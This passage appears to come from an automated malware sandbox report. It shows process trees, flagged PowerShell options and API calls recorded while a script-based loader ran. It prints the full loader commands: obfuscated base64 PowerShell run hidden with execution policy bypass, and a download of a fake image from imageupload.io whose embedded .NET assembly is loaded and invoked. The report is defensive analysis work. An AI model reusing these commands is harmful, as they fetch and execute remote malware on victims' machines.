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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('PzXsYGN','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process wscript.exe martian_process powershell -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('PzXsYGN','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lm9hbGloc2FtLzEyMS43Mi40MTIuNTkvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
Process injection Process 2768 resumed a thread in remote process 2996
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000033c
suspend_count: 1
process_identifier: 2996
1 0 0
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2632
thread_handle: 0x000002e8
process_identifier: 2628
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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